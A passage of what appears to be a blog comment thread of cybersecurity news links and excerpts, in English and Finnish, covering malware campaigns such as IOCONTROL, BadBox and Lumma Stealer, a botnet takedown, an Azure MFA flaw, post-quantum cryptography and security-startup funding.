Investors valued startup Material Security at $1.1 billion in a 2022 funding round. In August, Abnormal Security, which calls itself “AI-native,” said it was worth $5.1 billion after a funding round involving CrowdStrike
and Wellington Management. And on Thursday, Sublime Security, co-founded by U.S. Defense Department cybersecurity veteran Josh Kamdjou, said it had raised a round totaling $60 million.
Kamdjou, who is also Sublime’s CEO, had spent his former career showing companies how he could break into their networks and avoid being stymied by email security products. Then he decided to work on a solution.
“I decided to build something that would stop me as an attacker,” he said.
Tomi Engdahl says:
ICS/OT
Iranian Hackers Use IOCONTROL Malware to Target OT, IoT Devices in US, Israel
The Iranian threat group CyberAv3ngers has used custom-built malware named IOCONTROL to target IoT and OT devices in the US and Israel.
https://www.securityweek.com/iranian-hackers-use-iocontrol-malware-to-target-ot-iot-devices-in-us-israel/
Tomi Engdahl says:
Malware & Threats
Germany Sinkholes Botnet of 30,000 BadBox-Infected Devices
Germany’s cybersecurity agency BSI has sinkholed a botnet of 30,000 devices shipped with BadBox malware pre-installed.
https://www.securityweek.com/germany-sinkholes-botnet-of-30000-badbox-infected-devices/
At least 30,000 media devices were sold in Germany with pre-installed malware that ensnared them into a botnet, Germany’s Federal Office for Information Security (BSI) said on Thursday.
The infected photo frames and streaming devices were running older Android versions and were infected with the BadBox malware prior to arriving on shelves, the German cybersecurity agency says.
BSI says it has sinkholed the communication between the BadBox bots and their command-and-control (C&C) servers, instructing all internet providers in the country with more than 100,000 subscribers to help redirect traffic to the sinkhole.
The cybersecurity agency says it will work together with the internet providers to identify BadBox bots and alert consumers, and recommends that all infected devices be disconnected from the internet.
BadBox was initially detailed in October last year, after cybersecurity vendor Human Security discovered that over 70,000 Android smartphones, CTV boxes, and tablet devices from at least one Chinese manufacturer were shipped pre-installed with the Triada malware.
As part of the BadBox campaign uncovered by Human Security, roughly 280,000 Android and iOS devices were being abused to conduct various ad-fraud schemes through tens of applications designed to connect to a fake supply-side platform (SSP).
Tomi Engdahl says:
Microsoft Recall is capturing screenshots of sensitive information like credit card and social security numbers
Privacy nightmare is very real, and perfectly avoidable if you disable the feature for good
https://www.techspot.com/news/105943-microsoft-recall-capturing-screenshots-full-sensitive-information-despite.html
Tomi Engdahl says:
Data ProtectionGoogle’s Willow Chip Signals the Urgency of Post-Quantum Cryptography Migration
Google’s Willow quantum chip marks a transformative moment in quantum computing development.
https://www.securityweek.com/googles-willow-chip-signals-the-urgency-of-post-quantum-cryptography-migration/
Tomi Engdahl says:
https://www.theregister.com/2024/12/10/artivion_security_incident/
Tomi Engdahl says:
https://cybersecuritynews.com/windows-remote-desktop-services-vulnerability/
Tomi Engdahl says:
https://www.csoonline.com/article/3621101/aws-customers-face-massive-breach-amid-alleged-shinyhunters-regroup.html
Tomi Engdahl says:
Google says its breakthrough quantum chip can’t break modern cryptography / “The Willow chip is not capable of breaking modern cryptography,” Google’s director of quantum tells us.
https://www.theverge.com/2024/12/12/24319879/google-willow-cant-break-rsa-cryptography
Tomi Engdahl says:
33 open-source cybersecurity solutions you didn’t know you needed
Open-source cybersecurity tools provide transparency and flexibility, allowing users to examine and customize the source code to fit specific security needs. These tools make cybersecurity accessible to a broader range of organizations and individuals.
https://www.helpnetsecurity.com/2024/09/10/open-source-cybersec-tools/
Tomi Engdahl says:
Researchers Crack Microsoft Azure MFA in an Hour
A critical flaw in the company’s rate limit for failed sign-in attempts allowed unauthorized access to a user account, including Outlook emails, OneDrive files, Teams chats, Azure Cloud, and more.
https://www.darkreading.com/cyberattacks-data-breaches/researchers-crack-microsoft-azure-mfa-hour
Tomi Engdahl says:
Ovela haittaohjelma leviää nyt Suomessa – näin se iskee
https://www.ess.fi/uutissuomalainen/8142078
Traficomin Kyberturvallisuuskeskus tiedotti perjantaina, että Lumma Stealer -haittaohjelmaa on levitetty syksyn aikana muun muassa verkkosivujen popup-mainoksissa, valheellisissa hakukonetuloksissa ja sähköpostitse.
Tietoja varastavia haittaohjelmia pyritään levittämään tavoilla, jotka eivät vaikuta käyttäjän silmissä haittaohjelman levittämiseltä.
– Tarkkana tulee olla erityisesti verkkosivustojen kanssa, jotka pyytävät suorittamaan omalla laitteella komentoja, joiden todellista vaikutusta tai alkuperää ei välttämättä ymmärrä, kertoo tiedotteessa Traficomin Kyberturvallisuuskeskuksen erityisasiantuntija Helinä Turunen.
Levitystavasta riippumatta käyttäjää houkutellaan ajamaan verkkosivulta kopioitu teksti Windowsin komentokehotteeseen, minkä jälkeen koneelle asentuu haittaohjelma. Tätä menetelmää kuvataan nimellä “ClickFix”, ja sen avulla levitetään tällä hetkellä useita haittaohjelmia.
Haittaohjelma varastaa uhrien verkkoselaimista kirjautumistietoja, verkkopalveluihin todentamiseen käytettäviä evästeitä sekä selaushistoriaa. Lisäksi haittaohjelma pystyy varastamaan uhrin laitteelta löytyviä kryptovaluuttalompakoita ja tiedostoja.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/russian-cyber-spies-hide-behind-other-hackers-to-target-ukraine/
Tomi Engdahl says:
Police warn hundreds of Finns registered on crime-as-a-service websites
US and EU authorities have seized 63 websites considered the world’s biggest purveyors of services used in illegal distributed denial of service (DDoS) attacks
https://yle.fi/a/74-20130701
Tomi Engdahl says:
Avoimen koodin projektit hukkuvat uuteen ongelmaan – “tarvitaan perusteellisia muutoksia”
Suvi Korhonen11.12.202413:24Avoin lähdekoodiDigitalousTekoälyOhjelmistokehitys
Haavoittuvuuksien raportoinnista on avoimen koodin yhteisöille hyötyä, kunhan niitä lähetetään vain hyvästä syystä ja selkeästi laadittuina. Kehittäjät toivovat, että buginmetsästäjät tekisivät raportit huolellisesti.
https://www.tivi.fi/uutiset/avoimen-koodin-projektit-hukkuvat-uuteen-ongelmaan-tarvitaan-perusteellisia-muutoksia/ab2fe1a2-c738-4bed-ab1a-16523065b3b6
Tomi Engdahl says:
https://traficom.fi/fi/ajankohtaista/tilaisuudet/uusi-kyberkestavyyssaados-tulossa-nyt-aika-valmistautua-webinaari
Tomi Engdahl says:
https://www.techradar.com/vpn/vpn-privacy-security/russia-disconnects-several-regions-from-the-global-internet-to-test-its-sovereign-net